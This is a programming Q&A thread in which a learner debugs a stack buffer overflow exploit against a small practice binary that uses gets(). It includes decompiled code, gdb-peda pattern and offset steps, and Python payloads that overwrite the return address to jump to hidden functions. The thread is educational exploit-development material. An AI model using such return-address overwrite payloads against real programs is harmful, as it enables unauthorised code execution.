# Buffer Overflow only works on a specific function

Tags: c, gdb, reverse-engineering

I've been trying to exploit a buffer overflow and successfully executioned a function, but for some reason the second one doesn't seem to execute.

- Main Function (decompiled with Ghidra):

```
bool main(undefined param_1)

{
    int iVar1;
    bool bVar2;
    char local_28 [20];
    int local_14;
    undefined1 *local_10;
    
    local_10 = &param_1;
    local_14 = 0;
    puts("Indique o seu primeiro nome: ");
    gets(local_28);
    iVar1 = check_human_comprehension();
    if (iVar1 != 0) {
      local_14 = 1;
    }
    bVar2 = local_14 == 0;
    if (bVar2) {
      puts(&DAT_0001219c);
    }
    else {
      printf(&DAT_00012158,local_28);
    }
    return bVar2;
}
```

- Addresses for both "secret" functions:

```
gdb-peda$ p hidden_function 
$1 = {<text variable, no debug info>} 0x565561fd <hidden_function>
gdb-peda$ p debug_database_in_development 
$2 = {<text variable, no debug info>} 0x56556228 <debug_database_in_development>
```

- hidden_function

```
void hidden_function(void)
{
puts(s_Congra_ts_secret_function00012008);
return;
}
```

- debug_database_in_development

```
void debug_database_in_development(void)
{
  puts("Reading human users database...");
  system("cat file.bin");
  puts("\nFinished reading human users database...");
  return;
}
```

**Exploit:**

```
python3 -c 'print("A" * 28 + "\x28\x62\x55\x56")'
AAAAAAAAAAAAAAAAAAAAAAAAAAAA(bUV


./demo2                                                  
First Name: 
asd
Are you human?
AAAAAAAAAAAAAAAAAAAAAAAAAAAA(bUV
Reading human users database...
This file should be read from inside the vulnerable code.

Finished reading human users database...
zsh: segmentation fault  ./demo2
```

The exploit was found by using GDB-PETA and creating a pattern, finding the offset and inserting the address.

The first secret function is executed correctly but the second is not, even with the same parameters.

**Explanation of finding the offset (using GDB-PETA):**
0.5 Open the executable and run once

`gdb executable`

1. Create a pattern offset

```
gdb-peda$ pattern create 100
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
```

2. Run the program and input the pattern created

```
First Name:
asd
Are you human?
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
```

3. Check the value on EIP

```
...
EIP: 0x413b4141 ('AA;A')
...
```

4. Find the offset

```
gdb-peda$ pattern offset AA;A
AA;A found at offset: 28
```

5. Exploit

Comment: Please [edit] your question and add an explanation how exactly the exploit is supposed to work. I assume it is a buffer overflow. What exactly is it suposed to overwrite and how did you calculate the number of `A` characters?

Comment: I've edited the post and explained the process.

Comment: @Rui Vitorino,  Note that `gets(local_28);` is not standard code since C11 (2011) when `gets()` was dropped.  Perhaps study modern C overflows?

Comment: I'm sorry for the ignorance, but what does it mean by "modern"? If the gets is vulnerable for the on a first instance, why not the second?

Comment: It looks like the second function `debug_database_in_development` is being executed. What is the difference between the output you saw and the output you expect?

Comment: I expected, if I change the address present on the exploit, to execute the second function instead of the debug_database_in_development.

`
python3 -c 'print("A" * 28 + "\xfd\x61\x55\x56")'
AAAAAAAyaV
./demo2
...
Are u human?
AAAAAAAyaV

The second function should now be executed 
`

Comment: OK, so by "second function", you mean `hidden_function`. How are you entering the string? Are you typing it on the keyboard or piping the output of Python to demo2? "\xfd" is `ý` , so I would expect to see `ýaUV` if you were typing it - is that what you see?

Comment: Exactly! And yes the output would be that one, I messed up the conversion on my response. But with that input the function simply does not execute, only gives segmentation fault.

I'm copying it straight from the output of python and pasting it when the program needs it. No piping or stout/stdin redirect.

Comment: Luckily, you're running a debugger and can look at the program's memory and registers.  After the segfault, give GDB the command  "info reg" to see the registers. Look at $eip; maybe it's all 'A's, or maybe it contains only a portion of the address of hidden_function. Look at $esp and examine the 4 bytes at the top of the stack to see if that's the address of hidden_function.

Comment: This is really weird... the EIP has the value 0x5561bdc3 (all of the functions start from 0x56 up), the EBP has all A's and the ESP is pointing to 0xf7fc0056.